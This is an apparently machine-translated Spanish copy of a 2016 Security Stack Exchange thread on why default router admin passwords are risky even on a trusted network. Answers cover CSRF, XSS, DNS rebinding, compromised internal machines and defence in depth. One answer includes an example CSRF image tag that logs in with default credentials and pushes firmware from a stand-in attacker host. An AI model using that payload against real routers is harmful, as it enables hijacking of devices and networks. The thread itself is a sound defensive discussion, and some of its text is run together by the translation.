¿Es peligroso usar las contraseñas de administrador del enrutador predeterminadas si solo se permiten usuarios de confianza en la red?

55

Hay una gran cantidad de artículos abordar los peligros de las contraseñas predeterminadas de administrador del enrutador . Ciertas aplicaciones de seguridad también detectarán contraseñas de administrador de enrutador predeterminadas como una vulnerabilidad. Sin embargo, todos estos artículos se centran en lo que podría suceder si su enrutador estuviera comprometido.

Pero supongamos que tenemos un enrutador configurado de tal manera que el panel de administración solo está abierto a la red local. Además, suponga que la contraseña para conectarse a la red (es decir, a través de wifi) es lo suficientemente segura (es decir, muy alta entropía), y solo se permiten usuarios de confianza en la red.

En estas condiciones, ¿podría el enrutador seguir estando comprometido? ¿Sigue siendo necesario cambiar la contraseña de administrador del enrutador predeterminada? Mi opinión es que si un atacante no puede ingresar a la red, no puede comprometer el enrutador a pesar de la contraseña de administrador del enrutador. CSRF es una posibilidad, pero se puede defender contra con token CSRF. ¿Hay otras posibilidades que no haya considerado?

    
pregunta Zsw 28.10.2016 - 04:54
fuente

13 respuestas

45
  

¿Es peligroso usar contraseñas de administrador de enrutador predeterminadas si solo se permiten usuarios de confianza en la red?

Sí,espeligroso.Aquíhayalgunasformasmás"técnicas" de hacerlo (aparte de decir que es malo):

1. Sin protección CSRF

Podrías estar felizmente visitando un sitio web, y podría haber varios problemas con él:

  1. El sitio web en sí está haxored y tiene contenido malicioso insertado en él o:
  2. Cualquiera de los elementos en la página ha sido MITM en el medio atacado (cállate, estoy tratando de ser gracioso) y se han interceptado elementos con The Thing (tm), y;
  3. El ataque CSRF se insertó por estilo, img, enlace o cualquier otra cosa:

    Ejemplo aproximado:

    <img src="http://admin:admin@192.168.0.1/updateFirmware.cgi?file=hxxp://hax.com/hax.bin&confirmUpgrade=true"/>

Enmuchoscasos,laprotecciónCSRFnoserádeayudasipuedeiniciarsesiónconadmin:admin@routeripatravésdeunenlacecomoese.Crearáunanuevasesiónyuntokenparaustedenlugardeutilizarelactual.

FelicitacionesporsunuevainstalacióndeRouterBackdoor(tm)conaccesocompletoalashell.

2.LaprotecciónCSRFexiste,peronolaprotecciónXSSadecuada

Escapedelcontextoeinsertehax.js,osimplementeelcódigoJSquepodríarealizarlassiguientesfunciones:

  1. RobartokenCSRFconjavascript
  2. Ver<imgsrc=""/> arriba.

Además, las imágenes .svg pueden omitir una gran cantidad de protección XSS.

3. ¿Se puede acceder a la página de configuración del enrutador a través de la red inalámbrica?

Alguien inicia sesión en su red inalámbrica, visita la página de configuración del enrutador y realiza los cambios necesarios / actualiza el firmware / redirige el DNS / lo que sea que desee. Como la primera, pero con una interfaz de apuntar y hacer clic.

4. Otras formas

  • Empleados descontentos
  • Si alguien encuentra su camino en su red a través de otra máquina comprometida, puede usar esa máquina para comprometer su enrutador y se deshuesará.

Tenga en cuenta que los ataques XSS / CSRF podrían existir, o incluso agregarse durante las actualizaciones, si el proveedor es una mierda.

Así que no lo hagas. Por favor. Mi corazón no puede soportarlo. :(

    
respondido por el Mark Buffalo 28.10.2016 - 21:25
fuente
45

Como notaste correctamente, los ataques CSRF son una posibilidad. La prevención de ataques CSRF es posible con un token CSRF, pero esto no es nada que pueda hacer como usuario del enrutador. Por lo tanto, si usted es un proveedor de enrutadores, definitivamente debe implementar la protección CSRF, pero como usuario tiene que vivir con lo que el proveedor le ofrece y muchos proveedores no tienen la protección CSRF adecuada.

Más allá de CSRF hay otros ataques que se pueden usar contra el enrutador. De manera similar a CSRF, muchos de ellos utilizan el navegador como el trampolín, es decir, solo requieren una visita a algún sitio web que tenga vulnerabilidades incrustadas (como incrustadas en anuncios) y no necesiten un compromiso de la computadora del usuario. Entre estos se destacan los scripts de sitios cruzados (XSS) y los ataques de reenlace de DNS. Aquí nuevamente, el proveedor podría implementar la protección adecuada en teoría, pero en la práctica a menudo no se hace.

Y entonces, incluso los usuarios de confianza pueden tener su sistema comprometido a través de una variedad de formas. En este caso, el atacante está dentro de la red de confianza y el conocimiento de las contraseñas predeterminadas hace que sea mucho más fácil secuestrar el enrutador y hacer que el control del atacante sobre la red sea más permanente y menos obvio de esta manera.

Esto significa que incluso si crees que tienes la protección adecuada, debes cambiar la contraseña de la predeterminada en el espíritu de defensa en profundidad. Mientras más incógnitas tenga que descubrir un atacante para infiltrarse en la red, más difícil será para él y mejor protegerá su red. Y, por supuesto, esto también se aplica no solo a la contraseña sino a la seguridad general del enrutador, es decir, algunos enrutadores tienen errores o incluso puertas traseras en las que ni siquiera tiene que conocer la contraseña del usuario para una toma de posesión. Y no solo son enrutadores, sino que también debe vigilar otros dispositivos como impresoras, escáneres, bombillas inteligentes, televisores, etc.

    
respondido por el Steffen Ullrich 28.10.2016 - 06:28
fuente
23

Sí, los enrutadores se han visto comprometidos por un malware que se ejecuta dentro de la red, probando una lista de contraseñas por defecto. El malware ingresa a la red a través de un archivo adjunto de phishing infectado o una vulnerabilidad del navegador.

Si tiene la capacidad de validar que el enrutador no se puede reconfigurar fuera de la red local, no solo tiene la capacidad de cambiar la contraseña predeterminada, también tiene la obligación de corregirla.

    
respondido por el John Deters 28.10.2016 - 06:27
fuente
21

Me parece extraordinario que se haya formulado esta pregunta, y ni siquiera soy un profesional de la seguridad. Es un poco como preguntar "¿Está bien dejar la bóveda del banco desbloqueada si solo se permiten cajeros de confianza en el sótano?". Uno no sabe por dónde empezar a responder. Me pregunto si la pregunta fue un resumen del estilo de Ali G, publicado para el deporte.

Una contraseña predeterminada, para cualquier cosa, es poco mejor que un sistema que no usa una contraseña. En cierto sentido, en realidad es peor, porque fomenta la ilusión de la protección de contraseña (que podría ser un supuesto básico en el que otras partes de la seguridad del sistema se basan, en un sistema de controles y balances y controles de compensación), mientras que en realidad el La persona con intenciones maliciosas está ahora dentro. Se convierte en una especie de puerta trasera para aquellos que lo saben. Los evaluadores de bolígrafos hacen demostraciones regularmente en las ferias de TI de lo fácil que es buscar contraseñas predeterminadas en las hojas de datos de los proveedores y en la web.

Los problemas con las contraseñas predeterminadas van a empeorar mucho más cuando se inicie Internet of Things, el último ejemplo de una oferta sin demanda. Todavía me estoy tambaleando al ver un mapa de visualización proyectado de todas las calderas de Internet hackeables (sí, en serio) en Londres que revelaban la IP de la computadora de su propietario y aprendían las muñecas equipadas con cámara que se convirtieron en espías remotas en sus usuarios y reprogramadas para Juro por los chismes.

    
respondido por el Staycator 28.10.2016 - 11:48
fuente
6

¡SÍ!

No utilizarás el nombre de usuario o las contraseñas predeterminados

Esta es la razón por la que:

  1. Los enrutadores son famosos por ser vulnerables a las puertas traseras. [es decir, incluso si usted configuró las interfaces administrativas para que sean accesibles solo a través de la red local, no es poco probable que tenga un puerto de puerta trasera furtivo que esté expuesto a Internet.
  2. Las consolas web de enrutadores son infames por ser vulnerables a CSRF, XSS y muchas otras vulnerabilidades. Encadenando los dos anteriores, un atacante puede hacer que un usuario desprevenido inicie sesión con la contraseña de nombre de usuario predeterminada e incluso envíe solicitudes válidas para modificar las configuraciones. Interesantemente, todas estas acciones se pueden hacer en segundo plano, mientras el usuario está jugando un juego web;)
  3. La seguridad WiFi no depende completamente de la entropía de la contraseña. Depende del algoritmo utilizado también.
  4. Existen vulnerabilidades de día cero y cualquiera de los 'usuarios de confianza puede ser una de las víctimas. Si sus cuentas están comprometidas, estaría en problemas.
  5. Por último, pero no menos importante;
  

CSRF es una posibilidad, pero se puede defender contra CSRF   token.

Tadaa .. ninguno de los enrutadores lo ha arreglado todavía para sus interfaces. En el siglo 23, probablemente lo harán.

    
respondido por el hax 28.10.2016 - 06:28
fuente
4

Incluso un usuario de confianza puede tener su máquina pirateada. Usando esto como punto de partida, un atacante puede obtener acceso completo a sus enrutadores. En otras palabras, habría reducido la protección en caso de un ataque desde el interior. Este es un ejemplo clásico de estar cegado: un caballo de Troya.

    
respondido por el jdigital 28.10.2016 - 05:35
fuente
3

Esto puede parecer un poco sarcástico, pero si es lo suficientemente perezoso para no cambiar la contraseña predeterminada porque el dispositivo está en una red aislada, lo que quiere decir es que alguien no fue tan vago en la configuración de esta red segura. Además, su acceso a través de wifi anula la idea de que esta red es lo suficientemente segura. La única forma de aislar físicamente un dispositivo de red de manera que la contraseña predeterminada sea segura, sería no tener nada conectado (incluido el poder), encerrarlo en concreto y luego dejarlo caer en la zanja Marianas. Entonces aún tendrías que preocuparte por que James Cameron tenga acceso a él.

    
respondido por el Shackledtodesk 28.10.2016 - 05:17
fuente
3

Si cualquier dispositivo que esté utilizando para un punto de acceso inalámbrico termine en peligro ... si esta red tiene información confidencial, tendrá un mal momento.

¿Es altamente improbable que alguien explote una vulnerabilidad en su enrutador inalámbrico? Sí.

¿Es una posibilidad? Sí.

¡Si está hablando en serio de la seguridad de la red, SIEMPRE debería cambiar la contraseña predeterminada en su enrutador!

Además de los dispositivos de seguridad empresarial decentes (por ejemplo, aquellos que realizan escaneos de red de rutina, IDS, archivos de hosts personalizados, todas esas cosas divertidas) todavía no hay nada que impida que el malware ingrese a su red y aproveche el hecho de que sus contraseñas están configuradas para algo. predeterminado.

Al final del día, sus usuarios finales van a infectar su red.

No es tal vez, es solo cuestión de tiempo.

Diga que 'Jan en contabilidad' tiene 86 años y conoce a Jack sobre infosec.

Ella es más peligrosa que TODAS las otras amenazas a las que puedes enfrentarte día a día.

Cambia tu contraseña. Cambiar el nombre de usuario predeterminado.

Puede implementar todo tipo de medidas de protección y aun así estar comprometido debido a un nombre de usuario y contraseña predeterminados. Empleado descontento, alguien inteligente y todavía aprendiendo guión niño (durante el día del trabajo), pueden pasar todo tipo de cosas.

¿Por qué tomar el aumento en una empresa?

Y cuando cambias esta contraseña por el amor de Dios, no la conviertas en algo estúpido. He visto la configuración de redes (permisos compartidos abiertos con permiso de todos ... todo gritando qué y dónde está ... que tienen información escandalosamente sensible sobre ellos) y la contraseña ... a un enrutador externo es algo similar a '1234 # businessname' ... Me siento obligado a contactar a sus clientes y decirles que contrataron a una empresa de administración de TI que no toma en serio la seguridad.

Otra vez tengo mejores cosas que hacer.

Cuando reciban un golpe con un cryptolocker, terminarán enfrentando las consecuencias.

Perder un cliente de $ 50k / año realmente puede perjudicar a una pequeña empresa.

    
respondido por el Digital Shiba 28.10.2016 - 06:33
fuente
2

Me preocupa la idea detrás de "Mis pensamientos son que si un atacante no puede ingresar a la red, no puede comprometer el enrutador ...". Esto parece traicionar una falta total de apreciación del principio de segregación con buena seguridad.

Uno controla un riesgo con medidas relevantes directamente aplicables a donde surja, en lugar de cargar toda su confianza en los efectos indirectos de los controles globales o ubicados más remotamente en otra parte.

Se espera que los barcos no dejen entrar el agua (buena seguridad del perímetro), pero el constructor de barcos diligente aún se ajusta a los mamparos bajo la cubierta, de modo que cualquier penetración de agua que ocurra en violación de todos los esfuerzos de diseño en otros lugares aún está contenida en un área pequeña (Limitación del daño por compartimentación). El fatalmente llamado Herald of Free Enterprise redujo los costos al no molestarse en colocar mamparos. El 6 de marzo de 1987, por error del operador, dejó entrar agua a través de las puertas de proa abiertas. Apareció de manera violenta y solo tomó 90 segundos para volcar mientras apenas salía del puerto. 193 personas murieron en el agua casi congelada.

    
respondido por el Staycator 28.10.2016 - 12:27
fuente
0

Es posible que hayas oído hablar de, "Más vale prevenir que curar" .
No sea tan perezoso, que ni siquiera desea cambiar la contraseña predeterminada para sus enrutadores. Esto es algo básico de la clase 101 Siempre cambia la contraseña predeterminada . No importa qué tan seguras estén las condiciones hoy. Cambian con el tiempo. Nunca se sabe qué tipo de ataque se inventará en el futuro. Mantenerse al tanto de todo.

    
respondido por el Ugnes 28.10.2016 - 06:39
fuente
0

Como regla general, nunca confíe en un solo punto de falla. Todos aquí tienen puntos válidos. Si alguien realmente quiere en su red, es solo una cuestión de tiempo antes de tener acceso. Ya sea que se trate de un ataque de fuerza bruta, un ataque DDOS o solo una ingeniería social que engaña a uno de sus usuarios autenticados para que divulgue sus credenciales, con el tiempo, un solo punto de falla fallará. Asegure todo lo importante en su red, como si estuviera expuesto a Internet directamente. También tenga en cuenta que, si almacena información confidencial del cliente, será responsable ante el tribunal si se filtra.

    
respondido por el Shooter McGavin 28.10.2016 - 23:49
fuente
0

En principio, esto ni siquiera lleva tiempo desplegar. Si el modelo de su enrutador viene configurado con una contraseña aparentemente no aleatoria, el fabricante ni siquiera está intentando parecer seguro; Deben ser considerados indignos de confianza. Los fabricantes que intentan vender enrutadores baratos son notoriamente No vale la pena dar el beneficio de la duda . Ahora tienes un enrutador que no es de confianza. Como dices, esto sería un factor de riesgo grave.

Los enrutadores designados como que solo tienen usuarios de confianza (incluso excluyendo puertos externos) no son comunes.

Los sistemas domésticos alojan teléfonos inteligentes con poca seguridad (actualizaciones), como un ejemplo.

Los sistemas empresariales alojan usuarios que generalmente no deberían cambiar la configuración de la infraestructura.

Las redes configuradas como un ejercicio claramente no deberían usar configuraciones inseguras solo porque puedes salirse con la suya; El ejercicio es derrotado. (Excepción: el ejercicio es específicamente para demostrar valores predeterminados inseguros).

Las redes para pruebas aún merecen una cierta cantidad de atención. En algunos casos, esperaría que coincidieran con su descripción. Sin embargo, al determinar esto, estaría haciendo un punto de omitir la seguridad estándar. Nuevamente, en principio, no tiene por qué estar saboteando el sistema de esta manera.

Diceware es un poco molesto, pero reduce el problema para generar números aleatorios decentes. Google un sitio web para generar una página de tiradas de dados al azar, y recoger las tiradas al azar. Pegue la contraseña en el enrutador, y listo.

    
respondido por el sourcejedi 29.10.2016 - 22:09
fuente
0

Me pregunto si hay algún pensamiento implícito detrás de la Q original que dice: "Un riesgo: por lo tanto, un control para clasificarlo". Mientras que en realidad la relación entre riesgos y controles es de muchos, no de uno a uno.

Puede tener una alarma de coche. Este control aborda el riesgo de robo de artículos portátiles del automóvil, y también aborda el riesgo separado de que el automóvil sea llevado y retirado. (i): Un control; más de un riesgo relacionado.

Usted también tiene una puerta de coche con cerradura. Este es un control diferente pero aborda los dos riesgos anteriores.

Cada riesgo se aborda mediante más de un control (alarma y bloqueo de puerta).
Entonces (ii): Un riesgo (tomando cada uno a su vez); más de un control relacionado.

No dejaría de molestarse en cerrar con llave la puerta de su automóvil solo porque tiene una alarma de automóvil. Y contra el robo de automóviles, es posible que también tenga un aparato Krooklok o una barra del volante, una contraseña de encendido o señal acústica, o un rastreo remoto por GPS (tres, cuatro o incluso cinco controles contra un riesgo). Contra los intentos posteriores de vender o clonar el vehículo, tiene grabado el número de chasis en el parabrisas y, al menos, un lugar secreto (hasta seis controles contra el robo de vehículos o sus consecuencias directas).

Ninguno de estos controles es superfluo solo porque otros están en su lugar, aunque creo que la mayoría de nosotros consideraría a los seis como una exageración y no nos molestaría con las molestias de una alarma caprichosa o un dispositivo físico voluminoso que debe ser desbloqueado si es menos también está en marcha una buena seguridad onerosa.

En resumen, la relación entre los riesgos y los controles que los tratan no es uno a uno, y esto se aplica a las redes y enrutadores tanto como a cualquier otra cosa.

    
respondido por el Staycator 02.11.2016 - 16:55
fuente

Lea otras preguntas en las etiquetas